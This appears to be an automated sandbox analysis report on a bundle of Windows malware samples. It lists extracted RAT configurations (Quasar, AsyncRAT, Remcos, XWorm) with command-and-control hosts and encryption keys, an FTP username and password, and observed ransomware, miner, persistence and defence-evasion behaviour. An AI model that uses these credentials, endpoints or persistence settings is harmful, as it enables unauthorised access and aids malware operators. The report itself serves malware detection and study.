Resubmissions
31-12-2024 21:35
241231-1fmqnszqft 1031-12-2024 21:27
241231-1axzfssnek 1016-12-2024 05:27
241216-f5kx6awmh1 1014-12-2024 20:23
241214-y6jqlasrhy 1014-12-2024 20:22
241214-y51bysvmbk 1014-12-2024 20:13
241214-yzc98svkfr 1014-12-2024 13:14
241214-qgw1masrcy 1014-12-2024 13:12
241214-qfk7qsvlaq 312-12-2024 18:19
241212-wymq6ssnat 10Analysis
-
max time kernel
299s -
max time network
337s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 21:35
Static task
static1
Behavioral task
behavioral1
Sample
241127-xqsswsslej_pw_infected.zip
Resource
win10v2004-20241007-en
General
-
Target
241127-xqsswsslej_pw_infected.zip
-
Size
12KB
-
MD5
79fd058f7d06cc022de1786507eb26e3
-
SHA1
86590ec8ed73fd2951587561dff5387e9e0e18e6
-
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
-
SHA512
8316ac3782c05a3ebea4ca0868e33512e5ef29b251498f3af5ab261cd2010dec6b0eca8a57adcadb0d70653be2e22c0c2c137c7a38ec7b3d5ebbdd02e09c0227
-
SSDEEP
384:sBfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWT:wfACW6Dr8HWTHWT
Malware Config
Extracted
Protocol: ftp- Host:
ftpcluster.loopia.se - Port:
21 - Username:
srbreferee.com - Password:
luka2005
Extracted
quasar
1.4.1
Helper Atanka
193.203.238.136:8080
14f39659-ca5b-4af7-8045-bed3500c385f
-
encryption_key
11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424
-
install_name
diskutil.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
diskutil
-
subdirectory
diskutil
Extracted
asyncrat
0.5.8
Default
6.tcp.eu.ngrok.io:12925
hDtjdONRXVCh
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
remcos
RemoteHost
192.210.150.26:8787
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-R1T905
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
xworm
127.0.0.1:48990
147.185.221.22:48990
-
Install_directory
%Userprofile%
-
install_file
svchost.exe
Extracted
quasar
1.4.1
Manager
serveo.net:11453
a851cc5b-e50f-4270-9929-06c6323cdb3d
-
encryption_key
5A3C537E5FB2739D5B2468FC37915D58EF4AC5EA
-
install_name
Runtime broker.exe
-
log_directory
Microsoftsessential
-
reconnect_delay
3000
-
startup_key
Runtime broker
-
subdirectory
Microsoft_Essentials
Signatures
-
Asyncrat family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/files/0x000500000001e5bd-198.dat family_vidar_v7 behavioral1/memory/4468-203-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral1/memory/4468-251-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001e5a5-358.dat family_xworm behavioral1/memory/2852-365-0x0000000000AC0000-0x0000000000AD6000-memory.dmp family_xworm -
Jigsaw Ransomware
Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.
-
Jigsaw family
-
Quasar family
-
Quasar payload 4 IoCs
resource yara_rule behavioral1/files/0x001100000001e5a9-174.dat family_quasar behavioral1/memory/1184-181-0x00000000007F0000-0x0000000000B22000-memory.dmp family_quasar behavioral1/files/0x000500000001e787-683.dat family_quasar behavioral1/memory/5968-688-0x00000000000F0000-0x0000000000414000-memory.dmp family_quasar -
Remcos family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/376-152-0x0000000005A50000-0x0000000005D54000-memory.dmp family_stormkitty -
Stormkitty family
-
Vidar family
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/files/0x0003000000000735-102.dat family_xmrig behavioral1/files/0x0003000000000735-102.dat xmrig behavioral1/memory/228-110-0x00007FF7AE0F0000-0x00007FF7AED24000-memory.dmp xmrig behavioral1/memory/3080-339-0x00007FF7A8D00000-0x00007FF7A9934000-memory.dmp xmrig behavioral1/memory/3080-368-0x00007FF7A8D00000-0x00007FF7A9934000-memory.dmp xmrig behavioral1/memory/3080-498-0x00007FF7A8D00000-0x00007FF7A9934000-memory.dmp xmrig -
Xmrig family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/376-152-0x0000000005A50000-0x0000000005D54000-memory.dmp family_asyncrat behavioral1/files/0x000700000001e5bc-186.dat family_asyncrat -
Renames multiple (3767) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 91 3168 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 924 powershell.exe 3932 powershell.exe 1316 powershell.exe 2824 powershell.exe 2188 powershell.exe 5424 powershell.exe 5460 powershell.exe 5792 powershell.exe 4424 powershell.exe 6016 powershell.exe 4868 powershell.exe 3724 powershell.exe 3168 powershell.exe 5448 powershell.exe 5132 powershell.exe 1596 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5492 netsh.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation msedge..exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation diskutil.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation microsoft-onedrive.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation H8hsp6zrMtJI2hC.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation njSilent.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Jigsaw.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ghjaedjgaw.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5712 cmd.exe 2332 powershell.exe -
Deletes itself 1 IoCs
pid Process 6020 drpbx.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9d3a575fdcc2dd1782d18ac5655a8b28.exe svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk msedge..exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk msedge..exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9d3a575fdcc2dd1782d18ac5655a8b28.exe svchost.exe -
Executes dropped EXE 34 IoCs
pid Process 2828 New Text Document mod.exe 1408 4363463463464363463463463.exe 228 xmrig.exe 1492 Bootxr.exe 376 .exe 1184 diskutil.exe 3192 systempreter.exe 4468 ghjaedjgaw.exe 2052 diskutil.exe 3896 H8hsp6zrMtJI2hC.exe 3300 H8hsp6zrMtJI2hC.exe 3080 xmrig.exe 2628 njSilent.exe 2852 msedge..exe 1388 stub.exe 3576 stub.exe 5320 svchost.exe 5604 uncrypted.exe 3980 diskutil.exe 5968 Client-built.exe 4264 Jigsaw.exe 6020 drpbx.exe 5648 Runtime broker.exe 5460 SrbijaSetupHokej.exe 5272 SrbijaSetupHokej.tmp 3220 svchost.exe 5188 uncrypted.exe 5236 uncrypted.exe 1000 Hokej.exe 756 NVIDIA.exe 4980 microsoft-onedrive.exe 2136 Built.exe 3064 onedrive.exe 1564 Built.exe -
Loads dropped DLL 32 IoCs
pid Process 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 3576 stub.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe 1564 Built.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system0189 = "C:\\Users\\Admin\\Desktop\\241127-xqsswsslej_pw_infected\\Downloaders\\New Text Document mod.exse\\a\\.exe" .exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9d3a575fdcc2dd1782d18ac5655a8b28 = "\"C:\\Windows\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" Jigsaw.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gtw2hwrz.0fo\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1gmsphw5.eex\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUTDSRESW = "\"C:\\Users\\Admin\\Desktop\\241127-xqsswsslej_pw_infected\\Downloaders\\New Text Document mod.exse\\a\\Bootxr.exe\"" Bootxr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gtw2hwrz.0fo\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1gmsphw5.eex\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\Desktop\\241127-xqsswsslej_pw_infected\\Downloaders\\4363463463464363463463463\\Files\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\hwfix3hz.qo0\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\hwfix3hz.qo0\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9d3a575fdcc2dd1782d18ac5655a8b28 = "\"C:\\Windows\\svchost.exe\" .." svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\Desktop\\241127-xqsswsslej_pw_infected\\Downloaders\\4363463463464363463463463\\Files\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\svchost.exe" msedge..exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 128 raw.githubusercontent.com 71 raw.githubusercontent.com 72 raw.githubusercontent.com 93 6.tcp.eu.ngrok.io -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 142 ip-api.com 315 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created D:\autorun.inf svchost.exe File created F:\autorun.inf svchost.exe File opened for modification F:\autorun.inf svchost.exe File created C:\autorun.inf svchost.exe File opened for modification C:\autorun.inf svchost.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5268 tasklist.exe 4296 tasklist.exe 4076 tasklist.exe 872 tasklist.exe 4220 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3908 cmd.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3896 set thread context of 3300 3896 H8hsp6zrMtJI2hC.exe 146 PID 5604 set thread context of 5188 5604 uncrypted.exe 216 -
resource yara_rule behavioral1/memory/3576-402-0x00007FFCBA4C0000-0x00007FFCBAB23000-memory.dmp upx behavioral1/memory/3576-404-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp upx behavioral1/memory/3576-403-0x00007FFCC6A00000-0x00007FFCC6A27000-memory.dmp upx behavioral1/memory/3576-407-0x00007FFCC63C0000-0x00007FFCC63E5000-memory.dmp upx behavioral1/memory/3576-406-0x00007FFCC6520000-0x00007FFCC654B000-memory.dmp upx behavioral1/memory/3576-405-0x00007FFCC69A0000-0x00007FFCC69B9000-memory.dmp upx behavioral1/memory/3576-408-0x00007FFCC0A40000-0x00007FFCC0BBF000-memory.dmp upx behavioral1/memory/3576-409-0x00007FFCC6500000-0x00007FFCC6519000-memory.dmp upx behavioral1/memory/3576-411-0x00007FFCBA4C0000-0x00007FFCBAB23000-memory.dmp upx behavioral1/memory/3576-412-0x00007FFCC5EB0000-0x00007FFCC5EE4000-memory.dmp upx behavioral1/memory/3576-410-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp upx behavioral1/memory/3576-414-0x00007FFCC12A0000-0x00007FFCC136E000-memory.dmp upx behavioral1/memory/3576-413-0x00007FFCB9F80000-0x00007FFCBA4B3000-memory.dmp upx behavioral1/memory/3576-416-0x00007FFCDCE40000-0x00007FFCDCE4D000-memory.dmp upx behavioral1/memory/3576-415-0x00007FFCC63A0000-0x00007FFCC63B4000-memory.dmp upx behavioral1/memory/3576-435-0x00007FFCC6440000-0x00007FFCC64F3000-memory.dmp upx behavioral1/memory/3576-434-0x00007FFCC63C0000-0x00007FFCC63E5000-memory.dmp upx behavioral1/memory/3576-443-0x00007FFCC0A40000-0x00007FFCC0BBF000-memory.dmp upx behavioral1/memory/3576-481-0x00007FFCC5EB0000-0x00007FFCC5EE4000-memory.dmp upx behavioral1/memory/3576-483-0x00007FFCC12A0000-0x00007FFCC136E000-memory.dmp upx behavioral1/memory/3576-482-0x00007FFCB9F80000-0x00007FFCBA4B3000-memory.dmp upx behavioral1/memory/3576-527-0x00007FFCC6440000-0x00007FFCC64F3000-memory.dmp upx behavioral1/memory/3576-513-0x00007FFCBA4C0000-0x00007FFCBAB23000-memory.dmp upx behavioral1/memory/3576-544-0x00007FFCC63C0000-0x00007FFCC63E5000-memory.dmp upx behavioral1/memory/3576-536-0x00007FFCC6500000-0x00007FFCC6519000-memory.dmp upx behavioral1/memory/3576-551-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp upx behavioral1/memory/3576-552-0x00007FFCC5EB0000-0x00007FFCC5EE4000-memory.dmp upx behavioral1/memory/3576-550-0x00007FFCBA4C0000-0x00007FFCBAB23000-memory.dmp upx behavioral1/memory/3576-557-0x00007FFCC6440000-0x00007FFCC64F3000-memory.dmp upx behavioral1/memory/3576-556-0x00007FFCDCE40000-0x00007FFCDCE4D000-memory.dmp upx behavioral1/memory/3576-555-0x00007FFCC63A0000-0x00007FFCC63B4000-memory.dmp upx behavioral1/memory/3576-553-0x00007FFCB9F80000-0x00007FFCBA4B3000-memory.dmp upx behavioral1/memory/3576-554-0x00007FFCC12A0000-0x00007FFCC136E000-memory.dmp upx behavioral1/memory/3576-549-0x00007FFCC0A40000-0x00007FFCC0BBF000-memory.dmp upx behavioral1/memory/3576-548-0x00007FFCC6520000-0x00007FFCC654B000-memory.dmp upx behavioral1/memory/3576-547-0x00007FFCC69A0000-0x00007FFCC69B9000-memory.dmp upx behavioral1/memory/3576-546-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp upx behavioral1/memory/3576-545-0x00007FFCC6A00000-0x00007FFCC6A27000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-100.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\CalculatorSplashScreen.contrast-white_scale-100.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\SmallLogo.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-60_altform-unplated_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-36_altform-fullcolor.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Content\SaturationGradient.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-24_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare71x71Logo.scale-200_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-72_altform-unplated.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_selected_18.svg.fun drpbx.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunjce_provider.jar drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Dial\ZviewOverlay.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookMedTile.scale-100.png drpbx.exe File created C:\Program Files\7-Zip\Lang\tt.txt.fun drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reminders_18.svg drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_move_18.svg.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\ui-strings.js drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-24_altform-unplated_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg.fun drpbx.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeAppList.scale-100_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\6.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsLargeTile.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-30_altform-unplated.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Dial\RotateHorizontallyOverlay.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-32.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsStoreLogo.scale-200.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png.fun drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerLargeTile.contrast-white_scale-125.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoSearchResults_180x160.svg drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-150.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-48_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-200_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-32_contrast-black.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\caution.svg.fun drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\wordmui.msi.16.en-us.tree.dat drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png drpbx.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SmallTile.scale-125_contrast-black.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg.fun drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_altform-unplated_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-100.png drpbx.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\svchost.exe svchost.exe File created C:\Windows\svchost.exe njSilent.exe File opened for modification C:\Windows\svchost.exe njSilent.exe -
